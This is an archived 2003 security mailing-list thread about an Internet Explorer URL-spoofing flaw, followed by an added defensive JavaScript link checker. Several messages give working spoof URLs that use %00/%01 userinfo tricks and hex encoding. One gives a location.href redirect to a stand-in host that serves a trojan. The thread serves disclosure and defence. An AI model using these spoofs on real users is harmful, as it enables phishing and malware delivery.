Open Source and information security mailing list archives
 
Message-ID: <28915501A44DBA4587FE1019D675F9830FC1CA@grfint.intern.adiscon.com>
From: rgerhards at hq.adiscon.com (Rainer Gerhards)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

Well, 0x00 works even better (as usual). Consider the following URL:

http://www.microsoft.com:security%00@...w%77%2elinu%78%2eorg

This, together with a little social engineering, can do much. In my IE
6.0.2800.1106.xpsp2.03422-1633 this takes you to www.linux.org, which
is also shown in the address bar. The status bar will show
"www.microsoft.com:security" whenever you hover over relative links on
the site (check with the news). The trick will most probably work well
with fake sites that remove the address bar.

The 0x00 C string terminator often causes quite some trouble. I
remember reporting a similar problem to Microsoft some months ago, then
related to %00 not being correctly parsed by IIS. It was considered low
risk by Microsoft and not immediately addressed (I have to admit I
actually think this is at least not very high risk...). It should be
addressed by now.

Back to the discussed topic: I think it is also not very clever to
display credentials in the status bar. So if somebody is dumb enough to
actually use URLs with credentials, I think the browser should remove
them in all visible elements.

Rainer Gerhards
Adiscon






________________________________

	From: VeNoMouS [mailto:venom@...-x.co.nz] 
	Sent: Wednesday, December 10, 2003 6:03 AM
	To: Julian HO Thean Swee; full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL
parsing vulnerability
	
	
	Umm, tested this; you don't need %01 either, btw.
	 
	www.microsoft.com@....linux.org
	 
	Was messing around with some hex style as well. Is there a way to
call a file:// inside a http://? Because the issue with doing the @ trick
is it appends http:// automatically. Mind you, you could just make it exec
some vb code or something on a site; just a random idea anyway.
	 
	And it also doesn't seem to work if you use hex for the
full domain, i.e.
	 
	www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
	 
		nor  www.microsoft.com%40www.linux.org
	 
		whereas if you
www.microsoft.com@...%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works
	 
	 
	 
	 
	 
	 
	----- Original Message ----- 

		From: Julian HO Thean Swee <mailto:jho@...rhub.com>  
		To: 'full-disclosure@...ts.netsys.com' 
		Sent: Wednesday, December 10, 2003 4:22 PM
		Subject: [Full-Disclosure] RE: FWD: Internet Explorer
URL parsing vulnerability


		Hmm, it doesn't seem to work on my browser :)
		I don't even get transported to any page when I click the button.
		But then again, I have everything turned off in the internet zone by default...
		(but my submit non-encrypted form data is on)

		Does it really work then? It looks like it's using javascript...? (location.href)
		Merry Christmas everyone :)

			--__--__-- 

			Message: 1 
			Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
			From: S G Masood <sgmasood@...oo.com> 
			To: full-disclosure@...ts.netsys.com 
			Subject: [Full-Disclosure] RE: FWD: Internet
Explorer URL parsing vulnerability 


			LOL. This is so simple and dangerous, it almost made
			me laugh and cry at the same time. Most of you will
			realise why...;D
			The Paypal, AOL, Visa, Mastercard, et al email
			scammers will have a harvest of gold this month with
			lots of zombies falling for this simple technique.

			># POC ########## 
	
>http://www.zapthedingbat.com/security/ex01/vun1.htm 

			Don't be surprised if your latest download from
			http://www.microsoft.com turns out to be a trojan!

	
location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');


			-- 
			S.G.Masood 

			Hyderabad, 
			India 

			PS: One more thing - no scripting required to exploit this.

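Added example, not part of any message in this thread: a link check a mail filter or UI could run, flagging the userinfo and encoding tricks discussed above and producing a display form with credentials removed, as the top message suggests. The function name `inspectLink`, the finding labels and the `.example` hosts are assumptions made for this sketch; it relies on the standard `URL` parser in Node.js or a browser.

```javascript
// Added example. inspectLink() and its finding labels are hypothetical names;
// the sample URLs are constructed and use reserved .example hosts.
function inspectLink(raw) {
  const text = raw.trim();
  let url;
  try {
    url = new URL(text);
  } catch {
    return { host: null, display: null, findings: ['unparseable'] };
  }
  // Inspect the raw authority, before the parser normalises any encoding.
  const m = /^[a-z][a-z0-9+.-]*:\/\/([^\/?#\\]*)/i.exec(text);
  const authority = m ? m[1] : '';
  const at = authority.lastIndexOf('@'); // the last '@' ends the userinfo
  const userinfo = at >= 0 ? authority.slice(0, at) : null;
  const hostport = at >= 0 ? authority.slice(at + 1) : authority;

  const findings = [];
  if (userinfo !== null) {
    findings.push('userinfo-present');
    // %00, %01 and other encoded control bytes have no place in credentials.
    if (/%(?:[01][0-9a-f]|7f)/i.test(userinfo)) findings.push('control-char-in-userinfo');
    // A user name shaped like a domain is what makes the link misleading.
    if (/^[a-z0-9-]+(?:\.[a-z0-9-]+)+/i.test(userinfo)) findings.push('userinfo-looks-like-host');
  }
  if (hostport.includes('%')) findings.push('percent-encoded-host');

  const host = url.hostname; // decoded host the request would really go to
  url.username = ''; // strip credentials from everything shown to the user
  url.password = '';
  return { host, display: url.href, findings };
}

// Constructed samples mirroring the shapes discussed in the thread.
const samples = [
  'http://trusted.example:security%00@other.example/',
  'http://trusted.example@%6Fther%2Eexample/',
  'http://other.example/path',
];
for (const s of samples) console.log(s, inspectLink(s));
```

Showing `display` and `host` instead of the raw link text in status bars, tooltips and mail previews keeps the visible destination equal to the real one.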


